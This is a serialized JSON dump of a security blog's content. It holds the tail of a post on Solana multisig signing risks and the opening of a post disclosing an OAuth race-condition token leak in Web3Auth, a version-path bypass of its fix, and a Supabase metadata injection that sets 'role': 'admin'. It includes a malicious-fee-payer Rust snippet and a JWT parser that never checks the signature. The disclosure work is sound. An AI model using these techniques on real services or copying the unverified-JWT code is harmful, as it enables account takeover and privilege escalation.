{\n",{"type":27,"tag":207,"props":76107,"children":76108},{"class":209,"line":1475},[76109],{"type":27,"tag":207,"props":76110,"children":76111},{"style":4647},[76112],{"type":33,"value":76113}," // Nonce accounts are exactly 80 bytes long\n",{"type":27,"tag":207,"props":76115,"children":76116},{"class":209,"line":2065},[76117,76122,76127],{"type":27,"tag":207,"props":76118,"children":76119},{"style":220},[76120],{"type":33,"value":76121}," dataSize:",{"type":27,"tag":207,"props":76123,"children":76124},{"style":232},[76125],{"type":33,"value":76126}," 80",{"type":27,"tag":207,"props":76128,"children":76129},{"style":238},[76130],{"type":33,"value":1842},{"type":27,"tag":207,"props":76132,"children":76133},{"class":209,"line":2092},[76134],{"type":27,"tag":207,"props":76135,"children":76136},{"style":238},[76137],{"type":33,"value":44449},{"type":27,"tag":207,"props":76139,"children":76140},{"class":209,"line":2130},[76141],{"type":27,"tag":207,"props":76142,"children":76143},{"style":238},[76144],{"type":33,"value":76105},{"type":27,"tag":207,"props":76146,"children":76147},{"class":209,"line":2168},[76148],{"type":27,"tag":207,"props":76149,"children":76150},{"style":4647},[76151],{"type":33,"value":76152}," // The authority's 32-byte public key is written\n",{"type":27,"tag":207,"props":76154,"children":76155},{"class":209,"line":4095},[76156],{"type":27,"tag":207,"props":76157,"children":76158},{"style":4647},[76159],{"type":33,"value":76160}," // into bytes 8-40 of the nonce's account data.\n",{"type":27,"tag":207,"props":76162,"children":76163},{"class":209,"line":4103},[76164,76169],{"type":27,"tag":207,"props":76165,"children":76166},{"style":220},[76167],{"type":33,"value":76168}," memcmp:",{"type":27,"tag":207,"props":76170,"children":76171},{"style":238},[76172],{"type":33,"value":384},{"type":27,"tag":207,"props":76174,"children":76175},{"class":209,"line":4154},[76176,76181,76186,76190,76195],{"type":27,"tag":207,"props":76177,"children":76178},{"style":220},[76179],{"type":33,"value":76180}," bytes:",{"type":27,"tag":207,"props":76182,"children":76183},{"style":220},[76184],{"type":33,"value":76185}," AUTHORITY_PUBLIC_KEY",{"type":27,"tag":207,"props":76187,"children":76188},{"style":238},[76189],{"type":33,"value":1041},{"type":27,"tag":207,"props":76191,"children":76192},{"style":1335},[76193],{"type":33,"value":76194},"toBase58",{"type":27,"tag":207,"props":76196,"children":76197},{"style":238},[76198],{"type":33,"value":10778},{"type":27,"tag":207,"props":76200,"children":76201},{"class":209,"line":4203},[76202,76207,76212],{"type":27,"tag":207,"props":76203,"children":76204},{"style":220},[76205],{"type":33,"value":76206}," offset:",{"type":27,"tag":207,"props":76208,"children":76209},{"style":232},[76210],{"type":33,"value":76211}," 8",{"type":27,"tag":207,"props":76213,"children":76214},{"style":238},[76215],{"type":33,"value":1842},{"type":27,"tag":207,"props":76217,"children":76218},{"class":209,"line":4249},[76219],{"type":27,"tag":207,"props":76220,"children":76221},{"style":238},[76222],{"type":33,"value":32638},{"type":27,"tag":207,"props":76224,"children":76225},{"class":209,"line":4290},[76226],{"type":27,"tag":207,"props":76227,"children":76228},{"style":238},[76229],{"type":33,"value":44449},{"type":27,"tag":207,"props":76231,"children":76232},{"class":209,"line":4304},[76233],{"type":27,"tag":207,"props":76234,"children":76235},{"style":238},[76236],{"type":33,"value":76237}," ],\n",{"type":27,"tag":207,"props":76239,"children":76240},{"class":209,"line":5466},[76241],{"type":27,"tag":207,"props":76242,"children":76243},{"style":238},[76244],{"type":33,"value":5312},{"type":27,"tag":207,"props":76246,"children":76247},{"class":209,"line":5530},[76248],{"type":27,"tag":207,"props":76249,"children":76250},{"style":238},[76251],{"type":33,"value":1455},{"type":27,"tag":36,"props":76253,"children":76254},{},[76255,76257,76265],{"type":33,"value":76256},"Unfortunately this is not sufficient",{"type":27,"tag":22749,"props":76258,"children":76259},{},[76260],{"type":27,"tag":47,"props":76261,"children":76263},{"href":36885,"ariaDescribedBy":76262,"dataFootnoteRef":7,"id":36887},[22756],[76264],{"type":33,"value":1651},{"type":33,"value":76266},". A transaction may have multiple signers, and an attacker could use their own durable nonce fee-payer. This means our problem as defined above is unfortunately unsolvable.",{"type":27,"tag":101,"props":76268,"children":76270},{"className":10270,"code":76269,"language":10269,"meta":7,"style":7}," let instruction = system_instruction::transfer(&from, &ledger_base_pubkey, 42);\n let message =\n Message::new_with_nonce(vec![instruction], Some(&evil_nonce_authority), &nonce_account, &evil_nonce_authority)\n .serialize();\n",[76271],{"type":27,"tag":84,"props":76272,"children":76273},{"__ignoreMap":7},[76274,76340,76356,76439],{"type":27,"tag":207,"props":76275,"children":76276},{"class":209,"line":210},[76277,76281,76285,76289,76294,76298,76302,76306,76310,76314,76318,76322,76327,76331,76336],{"type":27,"tag":207,"props":76278,"children":76279},{"style":214},[76280],{"type":33,"value":10290},{"type":27,"tag":207,"props":76282,"children":76283},{"style":220},[76284],{"type":33,"value":50616},{"type":27,"tag":207,"props":76286,"children":76287},{"style":226},[76288],{"type":33,"value":229},{"type":27,"tag":207,"props":76290,"children":76291},{"style":238},[76292],{"type":33,"value":76293}," system_instruction",{"type":27,"tag":207,"props":76295,"children":76296},{"style":226},[76297],{"type":33,"value":10768},{"type":27,"tag":207,"props":76299,"children":76300},{"style":1335},[76301],{"type":33,"value":39382},{"type":27,"tag":207,"props":76303,"children":76304},{"style":238},[76305],{"type":33,"value":1343},{"type":27,"tag":207,"props":76307,"children":76308},{"style":226},[76309],{"type":33,"value":10398},{"type":27,"tag":207,"props":76311,"children":76312},{"style":220},[76313],{"type":33,"value":26744},{"type":27,"tag":207,"props":76315,"children":76316},{"style":238},[76317],{"type":33,"value":1123},{"type":27,"tag":207,"props":76319,"children":76320},{"style":226},[76321],{"type":33,"value":10398},{"type":27,"tag":207,"props":76323,"children":76324},{"style":220},[76325],{"type":33,"value":76326},"ledger_base_pubkey",{"type":27,"tag":207,"props":76328,"children":76329},{"style":238},[76330],{"type":33,"value":1123},{"type":27,"tag":207,"props":76332,"children":76333},{"style":232},[76334],{"type":33,"value":76335},"42",{"type":27,"tag":207,"props":76337,"children":76338},{"style":238},[76339],{"type":33,"value":1455},{"type":27,"tag":207,"props":76341,"children":76342},{"class":209,"line":244},[76343,76347,76352],{"type":27,"tag":207,"props":76344,"children":76345},{"style":214},[76346],{"type":33,"value":10290},{"type":27,"tag":207,"props":76348,"children":76349},{"style":220},[76350],{"type":33,"value":76351}," message",{"type":27,"tag":207,"props":76353,"children":76354},{"style":226},[76355],{"type":33,"value":43107},{"type":27,"tag":207,"props":76357,"children":76358},{"class":209,"line":270},[76359,76364,76368,76373,76377,76381,76385,76389,76393,76397,76401,76405,76410,76414,76418,76423,76427,76431,76435],{"type":27,"tag":207,"props":76360,"children":76361},{"style":8920},[76362],{"type":33,"value":76363}," Message",{"type":27,"tag":207,"props":76365,"children":76366},{"style":226},[76367],{"type":33,"value":10768},{"type":27,"tag":207,"props":76369,"children":76370},{"style":1335},[76371],{"type":33,"value":76372},"new_with_nonce",{"type":27,"tag":207,"props":76374,"children":76375},{"style":238},[76376],{"type":33,"value":1343},{"type":27,"tag":207,"props":76378,"children":76379},{"style":1335},[76380],{"type":33,"value":11159},{"type":27,"tag":207,"props":76382,"children":76383},{"style":238},[76384],{"type":33,"value":11019},{"type":27,"tag":207,"props":76386,"children":76387},{"style":220},[76388],{"type":33,"value":50926},{"type":27,"tag":207,"props":76390,"children":76391},{"style":238},[76392],{"type":33,"value":30333},{"type":27,"tag":207,"props":76394,"children":76395},{"style":8920},[76396],{"type":33,"value":49265},{"type":27,"tag":207,"props":76398,"children":76399},{"style":238},[76400],{"type":33,"value":1343},{"type":27,"tag":207,"props":76402,"children":76403},{"style":226},[76404],{"type":33,"value":10398},{"type":27,"tag":207,"props":76406,"children":76407},{"style":220},[76408],{"type":33,"value":76409},"evil_nonce_authority",{"type":27,"tag":207,"props":76411,"children":76412},{"style":238},[76413],{"type":33,"value":22452},{"type":27,"tag":207,"props":76415,"children":76416},{"style":226},[76417],{"type":33,"value":10398},{"type":27,"tag":207,"props":76419,"children":76420},{"style":220},[76421],{"type":33,"value":76422},"nonce_account",{"type":27,"tag":207,"props":76424,"children":76425},{"style":238},[76426],{"type":33,"value":1123},{"type":27,"tag":207,"props":76428,"children":76429},{"style":226},[76430],{"type":33,"value":10398},{"type":27,"tag":207,"props":76432,"children":76433},{"style":220},[76434],{"type":33,"value":76409},{"type":27,"tag":207,"props":76436,"children":76437},{"style":238},[76438],{"type":33,"value":10449},{"type":27,"tag":207,"props":76440,"children":76441},{"class":209,"line":296},[76442,76446,76451],{"type":27,"tag":207,"props":76443,"children":76444},{"style":226},[76445],{"type":33,"value":10457},{"type":27,"tag":207,"props":76447,"children":76448},{"style":1335},[76449],{"type":33,"value":76450},"serialize",{"type":27,"tag":207,"props":76452,"children":76453},{"style":238},[76454],{"type":33,"value":4301},{"type":27,"tag":36,"props":76456,"children":76457},{},[76458,76460,76467],{"type":33,"value":76459},"Luckily, it is tractable with a small modification. What if the signer is allowed to observe the fee-payer on the transaction? For example, Ledger ",{"type":27,"tag":47,"props":76461,"children":76464},{"href":76462,"rel":76463},"https://github.com/LedgerHQ/app-solana/blob/a19da6c301541390bd08731a10f1f128b38ee66e/src/handle_sign_message.c#L97",[51],[76465],{"type":33,"value":76466},"logs the fee-payer here",{"type":33,"value":1041},{"type":27,"tag":101,"props":76469,"children":76471},{"className":23789,"code":76470,"language":10435,"meta":7,"style":7},"bool print_config_show_authority(const PrintConfig* print_config, const Pubkey* authority) {\n return print_config->expert_mode || !pubkeys_equal(print_config->signer_pubkey, authority);\n}\n",[76472],{"type":27,"tag":84,"props":76473,"children":76474},{"__ignoreMap":7},[76475,76534,76590],{"type":27,"tag":207,"props":76476,"children":76477},{"class":209,"line":210},[76478,76482,76487,76491,76495,76500,76504,76509,76513,76517,76521,76525,76530],{"type":27,"tag":207,"props":76479,"children":76480},{"style":214},[76481],{"type":33,"value":36947},{"type":27,"tag":207,"props":76483,"children":76484},{"style":1335},[76485],{"type":33,"value":76486}," print_config_show_authority",{"type":27,"tag":207,"props":76488,"children":76489},{"style":238},[76490],{"type":33,"value":1343},{"type":27,"tag":207,"props":76492,"children":76493},{"style":214},[76494],{"type":33,"value":16931},{"type":27,"tag":207,"props":76496,"children":76497},{"style":238},[76498],{"type":33,"value":76499}," PrintConfig",{"type":27,"tag":207,"props":76501,"children":76502},{"style":226},[76503],{"type":33,"value":9286},{"type":27,"tag":207,"props":76505,"children":76506},{"style":220},[76507],{"type":33,"value":76508}," print_config",{"type":27,"tag":207,"props":76510,"children":76511},{"style":238},[76512],{"type":33,"value":1123},{"type":27,"tag":207,"props":76514,"children":76515},{"style":214},[76516],{"type":33,"value":16931},{"type":27,"tag":207,"props":76518,"children":76519},{"style":238},[76520],{"type":33,"value":28129},{"type":27,"tag":207,"props":76522,"children":76523},{"style":226},[76524],{"type":33,"value":9286},{"type":27,"tag":207,"props":76526,"children":76527},{"style":220},[76528],{"type":33,"value":76529}," authority",{"type":27,"tag":207,"props":76531,"children":76532},{"style":238},[76533],{"type":33,"value":1424},{"type":27,"tag":207,"props":76535,"children":76536},{"class":209,"line":244},[76537,76541,76545,76549,76554,76558,76562,76567,76571,76576,76580,76585],{"type":27,"tag":207,"props":76538,"children":76539},{"style":376},[76540],{"type":33,"value":8986},{"type":27,"tag":207,"props":76542,"children":76543},{"style":220},[76544],{"type":33,"value":76508},{"type":27,"tag":207,"props":76546,"children":76547},{"style":238},[76548],{"type":33,"value":8968},{"type":27,"tag":207,"props":76550,"children":76551},{"style":220},[76552],{"type":33,"value":76553},"expert_mode",{"type":27,"tag":207,"props":76555,"children":76556},{"style":226},[76557],{"type":33,"value":30971},{"type":27,"tag":207,"props":76559,"children":76560},{"style":226},[76561],{"type":33,"value":20141},{"type":27,"tag":207,"props":76563,"children":76564},{"style":1335},[76565],{"type":33,"value":76566},"pubkeys_equal",{"type":27,"tag":207,"props":76568,"children":76569},{"style":238},[76570],{"type":33,"value":1343},{"type":27,"tag":207,"props":76572,"children":76573},{"style":220},[76574],{"type":33,"value":76575},"print_config",{"type":27,"tag":207,"props":76577,"children":76578},{"style":238},[76579],{"type":33,"value":8968},{"type":27,"tag":207,"props":76581,"children":76582},{"style":220},[76583],{"type":33,"value":76584},"signer_pubkey",{"type":27,"tag":207,"props":76586,"children":76587},{"style":238},[76588],{"type":33,"value":76589},", authority);\n",{"type":27,"tag":207,"props":76591,"children":76592},{"class":209,"line":270},[76593],{"type":27,"tag":207,"props":76594,"children":76595},{"style":238},[76596],{"type":33,"value":451},{"type":27,"tag":36,"props":76598,"children":76599},{},[76600],{"type":33,"value":76601},"Let's say we've determined our signer has no associated nonce accounts. If our pubkey is the fee-payer on the new proposed transaction, we can know for sure that the transaction does not use durable nonces!",{"type":27,"tag":36,"props":76603,"children":76604},{},[76605],{"type":33,"value":76606},"Without durable nonces, the problem becomes much easier to solve. After waiting enough time, there'll be a point where all previously signed transactions will be expired. If we see no unexpected transactions, that means we're safe.",{"type":27,"tag":36,"props":76608,"children":76609},{},[76610],{"type":33,"value":76611},"We can then use the following procedure.",{"type":27,"tag":12719,"props":76613,"children":76614},{},[76615,76620,76625,76630,76635],{"type":27,"tag":1232,"props":76616,"children":76617},{},[76618],{"type":33,"value":76619},"Ensure all signers have no durable nonce accounts.",{"type":27,"tag":1232,"props":76621,"children":76622},{},[76623],{"type":33,"value":76624},"The first signer signs and submits the transaction.",{"type":27,"tag":1232,"props":76626,"children":76627},{},[76628],{"type":33,"value":76629},"Wait two minutes for all recent blockhashes to expire.",{"type":27,"tag":1232,"props":76631,"children":76632},{},[76633],{"type":33,"value":76634},"Observe recent transactions associated with the signer to ensure nothing unexpected is submitted.",{"type":27,"tag":1232,"props":76636,"children":76637},{},[76638],{"type":33,"value":76639},"Repeat steps 2 to 4 for each signer",{"type":27,"tag":28,"props":76641,"children":76643},{"id":76642},"beyond",[76644],{"type":33,"value":76645},"Beyond",{"type":27,"tag":36,"props":76647,"children":76648},{},[76649],{"type":33,"value":76650},"Solana's signature model is unique. What can protocols do if they're deploying on blockchains without these unique properties? The most important constraint is observability. There must be a way you can see what you're signing, either while signing or implicitly after the fact.",{"type":27,"tag":36,"props":76652,"children":76653},{},[76654,76656,76663],{"type":33,"value":76655},"For example, pcaversaccio wrote a tool to ",{"type":27,"tag":47,"props":76657,"children":76660},{"href":76658,"rel":76659},"https://github.com/pcaversaccio/safe-tx-hashes-util",[51],[76661],{"type":33,"value":76662},"validate Safe transaction hashes",{"type":33,"value":76664},". As the space matures, we hope more open source tooling will come to light.",{"type":27,"tag":25692,"props":76666,"children":76668},{"className":76667,"dataFootnotes":7},[25695],[76669,76674],{"type":27,"tag":28,"props":76670,"children":76672},{"className":76671,"id":22756},[25700],[76673],{"type":33,"value":25703},{"type":27,"tag":12719,"props":76675,"children":76676},{},[76677],{"type":27,"tag":1232,"props":76678,"children":76679},{"id":37627},[76680,76682,76690,76692],{"type":33,"value":76681},"The original version of this blog post did not consider a malicious fee-payer. Thanks to ",{"type":27,"tag":47,"props":76683,"children":76687},{"href":76684,"rel":76685,":style":76686},"https://twitter.com/PierreArowana",[51],"color: #B1D0EE; text-decoration: underline;",[76688],{"type":33,"value":76689},"@PierreArowana",{"type":33,"value":76691}," for pointing this out to me. ",{"type":27,"tag":47,"props":76693,"children":76695},{"href":37655,"ariaLabel":25805,"className":76694,"dataFootnoteBackref":7},[25807],[76696],{"type":33,"value":25810},{"type":27,"tag":10127,"props":76698,"children":76699},{},[76700],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":76702},[76703,76707,76708,76709],{"id":74899,"depth":244,"text":74902,"children":76704},[76705,76706],{"id":74910,"depth":270,"text":74913},{"id":75189,"depth":270,"text":75192},{"id":75910,"depth":244,"text":75913},{"id":76642,"depth":244,"text":76645},{"id":22756,"depth":244,"text":25703},"content:blog:2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security",{"_path":76714,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":76715,"description":76716,"date":76717,"author":76718,"image":76719,"isFeatured":19,"onBlogPage":19,"tags":76721,"body":76722,"_type":10152,"_id":78418,"_source":10154,"_file":78419,"_stem":78420,"_extension":10157},"/blog/2025-03-07-subverting-web2-authentication-in-web3","Subverting Web2 Authentication in Web3","Web3 authentication uses cryptographic signatures and wallets, but Web2 auth integrations can introduce hidden risks. We explore vulnerabilities like OAuth logic exploits, Supabase misconfigurations, and OAuth abuse in localhost setups.","2025-03-07",[38463,38462],{"src":76720},"/posts/web2-in-web3/title.jpg",[39400],{"type":24,"children":76723,"toc":78400},[76724,76729,76734,76739,76765,76771,76776,76782,76803,76809,76814,76821,76834,76864,76870,76914,76921,76927,76960,76981,76989,77008,77015,77020,77026,77031,77036,77061,77066,77072,77078,77099,77105,77132,77160,77167,77172,77177,77522,77526,77548,77554,77574,77588,77601,77606,77622,77627,78355,78360,78365,78370,78382,78386,78391,78396],{"type":27,"tag":36,"props":76725,"children":76726},{},[76727],{"type":33,"value":76728},"Authentication serves as a cornerstone of secure interactions in Web3, enabling access control, user identity verification, and transaction integrity. Unlike traditional Web2 systems, which often rely on centralized databases and password-based mechanisms, Web3 systems adopt decentralized identifiers (DIDs), cryptographic signatures, and wallet-based authentication. However, there are many applications that still use Web2-based authentication providers to improve the user experience.",{"type":27,"tag":36,"props":76730,"children":76731},{},[76732],{"type":33,"value":76733},"In our research, we focused on Web3 applications that rely on Web2-based authentication methods. Specifically, we analyzed the authentication flows of these applications and identified a lesser-known class of vulnerabilities.",{"type":27,"tag":36,"props":76735,"children":76736},{},[76737],{"type":33,"value":76738},"In this article, we will discuss three cases we discovered:",{"type":27,"tag":12719,"props":76740,"children":76741},{},[76742,76747,76760],{"type":27,"tag":1232,"props":76743,"children":76744},{},[76745],{"type":33,"value":76746},"OAuth Logic Vulnerability on an Authentication Provider",{"type":27,"tag":1232,"props":76748,"children":76749},{},[76750,76752,76758],{"type":33,"value":76751},"Supabase ",{"type":27,"tag":84,"props":76753,"children":76755},{"className":76754},[],[76756],{"type":33,"value":76757},"user_metadata",{"type":33,"value":76759}," misconfiguration",{"type":27,"tag":1232,"props":76761,"children":76762},{},[76763],{"type":33,"value":76764},"OAuth abuse in localhost development environment",{"type":27,"tag":28,"props":76766,"children":76768},{"id":76767},"abusing-oauth-authentication-logic",[76769],{"type":33,"value":76770},"Abusing OAuth Authentication Logic",{"type":27,"tag":36,"props":76772,"children":76773},{},[76774],{"type":33,"value":76775},"During our research, we initially identified some bugs in applications. However, these were mostly simple and well-known issues, so we decided to focus on vulnerabilities within authentication providers themselves.",{"type":27,"tag":58,"props":76777,"children":76779},{"id":76778},"web3auth-introduction",[76780],{"type":33,"value":76781},"Web3Auth Introduction",{"type":27,"tag":36,"props":76783,"children":76784},{},[76785,76792,76794,76801],{"type":27,"tag":47,"props":76786,"children":76789},{"href":76787,"rel":76788},"https://web3auth.io/",[51],[76790],{"type":33,"value":76791},"Web3Auth",{"type":33,"value":76793}," is a tool designed to simplify the login process for Web3 applications, eliminating the need for users to manage complex wallet setups or memorize lengthy passwords. One of its products, Web3Auth PnP (Plug and Play), supports ",{"type":27,"tag":47,"props":76795,"children":76798},{"href":76796,"rel":76797},"https://oauth.net/2/",[51],[76799],{"type":33,"value":76800},"OAuth2",{"type":33,"value":76802}," authentication using Google. The product employs a sophisticated authentication flow and infrastructure to maintain seamless integration with dApps.",{"type":27,"tag":58,"props":76804,"children":76806},{"id":76805},"web3auth-authentication-flow",[76807],{"type":33,"value":76808},"Web3Auth Authentication flow",{"type":27,"tag":36,"props":76810,"children":76811},{},[76812],{"type":33,"value":76813},"The Web3Auth PnP authentication flow involves a web session server that stores authentication parameters and configurations. Below is a diagram illustrating how the authentication process works:",{"type":27,"tag":36,"props":76815,"children":76816},{},[76817],{"type":27,"tag":126,"props":76818,"children":76820},{"alt":57817,"src":76819},"/posts/web2-in-web3/auth-flow.png",[],{"type":27,"tag":36,"props":76822,"children":76823},{},[76824,76826,76832],{"type":33,"value":76825},"After the final redirect back to the dApp, the application can use the secret token to authenticate with the service identified by the ",{"type":27,"tag":84,"props":76827,"children":76829},{"className":76828},[],[76830],{"type":33,"value":76831},"client_id",{"type":33,"value":76833},". This design ensures that you cannot use the token to authenticate against any unauthorized application.",{"type":27,"tag":36,"props":76835,"children":76836},{},[76837,76839,76845,76847,76853,76855,76862],{"type":33,"value":76838},"Additionally, it is important to note that each dApp has a whitelist of redirect URLs. The ",{"type":27,"tag":84,"props":76840,"children":76842},{"className":76841},[],[76843],{"type":33,"value":76844},"/start",{"type":33,"value":76846}," validates the ",{"type":27,"tag":84,"props":76848,"children":76850},{"className":76849},[],[76851],{"type":33,"value":76852},"redirect_url",{"type":33,"value":76854}," against the configured ",{"type":27,"tag":47,"props":76856,"children":76859},{"href":76857,"rel":76858},"https://web3auth.io/docs/dashboard-setup/whitelisting",[51],[76860],{"type":33,"value":76861},"whitelist",{"type":33,"value":76863}," to ensure it matches one of the allowed URLs.",{"type":27,"tag":58,"props":76865,"children":76867},{"id":76866},"in-transit-cryptography",[76868],{"type":33,"value":76869},"In-transit Cryptography",{"type":27,"tag":36,"props":76871,"children":76872},{},[76873,76875,76882,76884,76890,76892,76898,76900,76905,76907,76912],{"type":33,"value":76874},"The session server employs cryptography to securely send and receive authentication parameters. The ",{"type":27,"tag":47,"props":76876,"children":76879},{"href":76877,"rel":76878},"https://en.wikipedia.org/wiki/Key_(cryptography)",[51],[76880],{"type":33,"value":76881},"cryptographic key",{"type":33,"value":76883}," is derived from the ",{"type":27,"tag":84,"props":76885,"children":76887},{"className":76886},[],[76888],{"type":33,"value":76889},"sessionId",{"type":33,"value":76891}," sent in the ",{"type":27,"tag":84,"props":76893,"children":76895},{"className":76894},[],[76896],{"type":33,"value":76897},"GET",{"type":33,"value":76899}," parameter to the ",{"type":27,"tag":84,"props":76901,"children":76903},{"className":76902},[],[76904],{"type":33,"value":76844},{"type":33,"value":76906},". Since the ",{"type":27,"tag":84,"props":76908,"children":76910},{"className":76909},[],[76911],{"type":33,"value":76889},{"type":33,"value":76913}," can be controlled, it allows us to send and receive data from the session server.",{"type":27,"tag":36,"props":76915,"children":76916},{},[76917],{"type":27,"tag":126,"props":76918,"children":76920},{"alt":57817,"src":76919},"/posts/web2-in-web3/image-2.png",[],{"type":27,"tag":58,"props":76922,"children":76924},{"id":76923},"race-condition",[76925],{"type":33,"value":76926},"Race Condition",{"type":27,"tag":36,"props":76928,"children":76929},{},[76930,76932,76937,76939,76945,76947,76952,76954,76959],{"type":33,"value":76931},"As shown in the diagram, the configuration data from the session server is validated only during the ",{"type":27,"tag":84,"props":76933,"children":76935},{"className":76934},[],[76936],{"type":33,"value":76844},{"type":33,"value":76938}," and later used in the ",{"type":27,"tag":84,"props":76940,"children":76942},{"className":76941},[],[76943],{"type":33,"value":76944},"/end",{"type":33,"value":76946}," enpoint. This introduces a potential race condition that can be exploited if an attacker manages to modify the parameters after validation (",{"type":27,"tag":84,"props":76948,"children":76950},{"className":76949},[],[76951],{"type":33,"value":76844},{"type":33,"value":76953},") but before use (",{"type":27,"tag":84,"props":76955,"children":76957},{"className":76956},[],[76958],{"type":33,"value":76944},{"type":33,"value":28014},{"type":27,"tag":36,"props":76961,"children":76962},{},[76963,76965,76972,76974,76979],{"type":33,"value":76964},"To exploit this ",{"type":27,"tag":47,"props":76966,"children":76969},{"href":76967,"rel":76968},"https://portswigger.net/web-security/race-conditions",[51],[76970],{"type":33,"value":76971},"race condition",{"type":33,"value":76973},", an attacker-controlled website can initiate the authentication flow normally. Then, it can send another request to the session server with the same ",{"type":27,"tag":84,"props":76975,"children":76977},{"className":76976},[],[76978],{"type":33,"value":76889},{"type":33,"value":76980}," but with modified malicious parameters.",{"type":27,"tag":36,"props":76982,"children":76983},{},[76984],{"type":27,"tag":12606,"props":76985,"children":76986},{},[76987],{"type":33,"value":76988},"What can be modified to achieve something impactful?",{"type":27,"tag":36,"props":76990,"children":76991},{},[76992,76994,77000,77002,77007],{"type":33,"value":76993},"The answer is quite simple if you understand how OAuth works. The attacker can simply change the ",{"type":27,"tag":84,"props":76995,"children":76997},{"className":76996},[],[76998],{"type":33,"value":76999},"redirect_uri",{"type":33,"value":77001}," parameter to point to their own website and leak the secret token from the query string. With the secret token, they can authenticate against the application defined by ",{"type":27,"tag":84,"props":77003,"children":77005},{"className":77004},[],[77006],{"type":33,"value":76831},{"type":33,"value":1041},{"type":27,"tag":36,"props":77009,"children":77010},{},[77011],{"type":27,"tag":126,"props":77012,"children":77014},{"alt":57817,"src":77013},"/posts/web2-in-web3/image-3.png",[],{"type":27,"tag":36,"props":77016,"children":77017},{},[77018],{"type":33,"value":77019},"Using this exploit, we were able to create a website capable of taking over the accounts of victims who followed the standard OAuth flow.",{"type":27,"tag":58,"props":77021,"children":77023},{"id":77022},"patch-bypass",[77024],{"type":33,"value":77025},"Patch & Bypass",{"type":27,"tag":36,"props":77027,"children":77028},{},[77029],{"type":33,"value":77030},"The vulnerability was reported and remediated on the same day (super quickly!). However, we found that the fix was not backported to older versions.",{"type":27,"tag":36,"props":77032,"children":77033},{},[77034],{"type":33,"value":77035},"To bypass the fix we were able to change the version in the URL:",{"type":27,"tag":1228,"props":77037,"children":77038},{},[77039,77050],{"type":27,"tag":1232,"props":77040,"children":77041},{},[77042,77048],{"type":27,"tag":84,"props":77043,"children":77045},{"className":77044},[],[77046],{"type":33,"value":77047},"https://auth.web3auth.io/v8/start",{"type":33,"value":77049}," (latest version)",{"type":27,"tag":1232,"props":77051,"children":77052},{},[77053,77059],{"type":27,"tag":84,"props":77054,"children":77056},{"className":77055},[],[77057],{"type":33,"value":77058},"https://auth.web3auth.io/v6/start",{"type":33,"value":77060}," (bypass)",{"type":27,"tag":36,"props":77062,"children":77063},{},[77064],{"type":33,"value":77065},"We reported this issue, and it was addressed just as quickly!",{"type":27,"tag":28,"props":77067,"children":77069},{"id":77068},"supabase-metadata-manipulation",[77070],{"type":33,"value":77071},"Supabase metadata manipulation",{"type":27,"tag":58,"props":77073,"children":77075},{"id":77074},"supabase-authentication-flow",[77076],{"type":33,"value":77077},"Supabase Authentication flow",{"type":27,"tag":36,"props":77079,"children":77080},{},[77081,77088,77090,77097],{"type":27,"tag":47,"props":77082,"children":77085},{"href":77083,"rel":77084},"https://supabase.com/docs/guides/auth",[51],[77086],{"type":33,"value":77087},"Supabase",{"type":33,"value":77089}," is a Backend-as-a-Service (BaaS) platform that provides authentication, database, and real-time APIs. The authentication process begins when a user registers or logs in. Supabase generates a ",{"type":27,"tag":47,"props":77091,"children":77094},{"href":77092,"rel":77093},"https://jwt.io/",[51],[77095],{"type":33,"value":77096},"JWT",{"type":33,"value":77098}," for the authenticated user, embedding claims such as the user ID, roles, and additional metadata (either user-provided or system-generated). This token is then returned to the client and used for subsequent API requests, during which the server validates the JWT to confirm the user’s identity and permissions.",{"type":27,"tag":58,"props":77100,"children":77102},{"id":77101},"jwt-verification",[77103],{"type":33,"value":77104},"JWT verification",{"type":27,"tag":36,"props":77106,"children":77107},{},[77108,77110,77115,77116,77122,77124,77130],{"type":33,"value":77109},"In one of our clients' systems, we discovered a vulnerability that allowed the inclusion of custom fields, such as ",{"type":27,"tag":84,"props":77111,"children":77113},{"className":77112},[],[77114],{"type":33,"value":76757},{"type":33,"value":1131},{"type":27,"tag":84,"props":77117,"children":77119},{"className":77118},[],[77120],{"type":33,"value":77121},"identity_data",{"type":33,"value":77123},", in a signup request by manipulating the input inside the ",{"type":27,"tag":84,"props":77125,"children":77127},{"className":77126},[],[77128],{"type":33,"value":77129},"\"data\": {}",{"type":33,"value":77131}," structure. These fields were then directly reflected in the issued JWT without validation.",{"type":27,"tag":36,"props":77133,"children":77134},{},[77135,77137,77143,77144,77150,77152,77158],{"type":33,"value":77136},"For example, an attacker could send a signup request with arbitrary data, such as ",{"type":27,"tag":84,"props":77138,"children":77140},{"className":77139},[],[77141],{"type":33,"value":77142},"\"role\": \"admin\"",{"type":33,"value":20411},{"type":27,"tag":84,"props":77145,"children":77147},{"className":77146},[],[77148],{"type":33,"value":77149},"\"email_verified\": true",{"type":33,"value":77151},", which would subsequently be included in the JWT claims. Additionally, it was possible to insert arbitrary fields beyond typical inputs, such as ",{"type":27,"tag":84,"props":77153,"children":77155},{"className":77154},[],[77156],{"type":33,"value":77157},"\"test\": \"test\"",{"type":33,"value":77159},", enabling us to inject arbitrary data into the final JWT token.",{"type":27,"tag":36,"props":77161,"children":77162},{},[77163],{"type":27,"tag":126,"props":77164,"children":77166},{"alt":57817,"src":77165},"/posts/web2-in-web3/image-4.png",[],{"type":27,"tag":36,"props":77168,"children":77169},{},[77170],{"type":33,"value":77171},"In this example we are controlling the \"role\" field within the user metadata. If the application manage roles using the metadata, it would be vulnerable to a privilege escalation since anyone could inject any role there.",{"type":27,"tag":36,"props":77173,"children":77174},{},[77175],{"type":33,"value":77176},"The attacker could subsequently log in on the main platform, retrieve the token, and verify that their injected parameters persist in the JWT by submitting it to a verification endpoint. This happens because a function parseSupaBase was parsing and verifying everything generated by the JWT supabase token.",{"type":27,"tag":101,"props":77178,"children":77180},{"className":201,"code":77179,"language":200,"meta":7,"style":7},"function parseSupaBase(token) {\n try {\n const [header, payload, signature] = token.split('.');\n const decodedHeader = JSON.parse(atob(header));\n const decodedPayload = JSON.parse(atob(payload));\n return { header: decodedHeader, payload: decodedPayload, signature };\n } catch (error) {\n console.error('Error parsing token:', error);\n return null;\n 